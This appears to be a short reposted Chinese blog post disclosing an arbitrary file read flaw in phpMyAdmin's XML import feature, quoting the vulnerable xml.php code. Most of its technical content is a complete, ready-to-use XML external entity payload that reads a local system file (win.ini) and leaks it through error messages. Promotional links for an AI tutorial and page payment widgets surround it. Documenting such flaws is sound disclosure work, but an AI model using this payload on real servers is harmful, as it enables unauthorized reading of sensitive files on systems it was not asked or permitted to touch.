PhpMyadmin任意文件读取漏洞

分享一下我老师大神的人工智能教程!零基础,通俗易懂!http://blog.csdn.net/jiangjunshow

也欢迎大家转载本篇文章。分享知识,造福人民,实现我们中华民族伟大复兴!

                 

libraries/import/xml.php中

unset($data);/** * Load the XML string * * The option LIBXML_COMPACT is specified because it can * result in increased performance without the need to * alter the code in any way. It's basically a freebee. */$xml = simplexml_load_string($buffer, "SimpleXMLElement", LIBXML_COMPACT);unset($buffer);/** * The XML was malformed */if ($xml === FALSE) {



可以使用系统中的import功能导入一个精心构造的xml文件

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE wooyun [  <!ENTITY hi80sec SYSTEM "file:///c:/windows/win.ini">]><!--- phpMyAdmin XML Dump- version 3.4.4- http://www.phpmyadmin.net-- 主机: localhost- 生成日期: 2011 年 11 月 01 日 14:56- 服务器版本: 5.1.28- PHP 版本: 5.2.6--><pma_xml_export version="1.0" xmlns:pma="http://www.phpmyadmin.net/some_doc_url/">    <!--    - Structure schemas    -->    <pma:structure_schemas>        <pma:database name="test" collation="utf8_general_ci" charset="utf8">            <pma:table name="ts_ad">                &hi80sec;            </pma:table>        </pma:database>    </pma:structure_schemas>    <!--    - 数据库: 'thinksns'    -->    <database name="thinksns">        <!-- 表 ts_ad -->    </database></pma_xml_export>


来读写文件,系统错误信息会直接显示出文件内容

           

给我老师的人工智能教程打call!http://blog.csdn.net/jiangjunshow
这里写图片描述
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值